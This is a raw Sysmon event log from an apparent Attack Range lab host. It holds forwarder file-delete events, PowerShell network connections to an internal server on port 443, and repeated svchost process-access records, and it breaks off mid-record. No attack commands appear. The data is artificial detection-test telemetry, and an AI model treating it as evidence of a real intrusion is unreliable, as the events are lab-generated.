23542300x800000000000000035126717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:45.913{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91D8D567DB7B75760C4FB91B88A831B5,SHA256=36455617444F98342790A6C00C2E4C610A9875EC90C4ABA04745FE031540FAC8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:46.943{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2615F6A795ED3D2B96E0BC9610F19914,SHA256=BB2104F91C28A9E0B9F1B9F756FAC02BB273F0D89E8BD5B904826810DB5771B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:47.973{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB21565849BB06326F16E79DED743F50,SHA256=F0F406FD52FC4B0516946CE1EABB17423F61521ABA3BF19FC02F515CDE2F8DF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:47.293{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F301A04F5CE1C1EE321F3E89F8592D20,SHA256=E2A508B98EF88A79666C511D83340806E276CECA6BF825E17F1AD09C543BDBE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:12.420{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61932-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035126723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:13.403{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61933-false10.0.1.12-8000- 23542300x800000000000000035126722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:49.041{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F53B00FDC88F3D8231299D12CFC8CA56,SHA256=6AFF73A7EF27B8A139D46770AA132D24689F36CFA5D65293096C0D0B0A054D91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:50.055{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F31FABAEBAA4B8E11F0EC24F3F9CED35,SHA256=543C359E526F0C968CD724D271ADC160266A6B18D1A82B3634A42A20739CAEE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:51.088{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11E7E6E82A0EFC0C0AA78F1274B778C5,SHA256=2706865B335B562D2FB33F908EE5E8D49359A5CC74718C95A16097B654EB031B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:52.122{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D05B93E8E0981D96237B0D9BC2110879,SHA256=2AEC0428AE054223EE8A11591AE1243B43C2A562B3566AB2F9DCCBC0CB6DD93B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:18.429{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61934-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:53.267{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6B60C5811E1D7E683C23A01CC4799537,SHA256=E7D24270FC2058A40CBD1A2242B499384E21A114ECEA8A568B6B042C9930BC4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:53.136{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78E0D5F67530AAB437F82369E7E51F2E,SHA256=13F71BF98B5485807706F27E89A43816E7196556E42A8251D4C86692A7DA5A58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:54.151{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4960CCDC7E1FCFE771C002FEF80CBBE4,SHA256=509CBB74BC469DA3C75A8ECF52AE0DBB1C0E4FCDF35B7D5E8085EE2903F4CDEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:19.296{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61935-false10.0.1.12-8000- 23542300x800000000000000035126731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:55.151{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5F4147D53D7D9A500406255F21D65C4,SHA256=0A781657C15F46604AB471AA51F25FFE88F334D1C10FE3C5901A9CD426F45299,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:56.165{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD4BB971900E28EC6644B3FEA6380CD3,SHA256=07A6AAC092B42AE37420F28687741C18C74A35A019104379E26AF5FE72BAB6F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:57.482{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B91BD3B21C77F00DBD8CF9067AD14980,SHA256=D2EC1B30E7844011F64C028A33598A82713396BE63E646ED162A3A6E0E7D84D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:22.441{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61936-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:57.182{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E371C175E048D0A44EA0F55258F8E82F,SHA256=F64507E590FBBAAF12CCC00AAFE9CEFE069D5B502E431AB1B8C41FCE30E3CF23,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:58.200{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D98B83BDB13570390FD87276CAAA6E1,SHA256=6F3917D8E0FAE28207BDE98A416C307DD2B859967C384D5BDA60883D8F20BEEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.900{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.248{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4599BED0AF2E6F75FA47EF9266574061,SHA256=3EBF54C31EDBB489FEA618F9C816FF3B64079A54A3A38219B4B50B153ADAC8CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:59.101{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 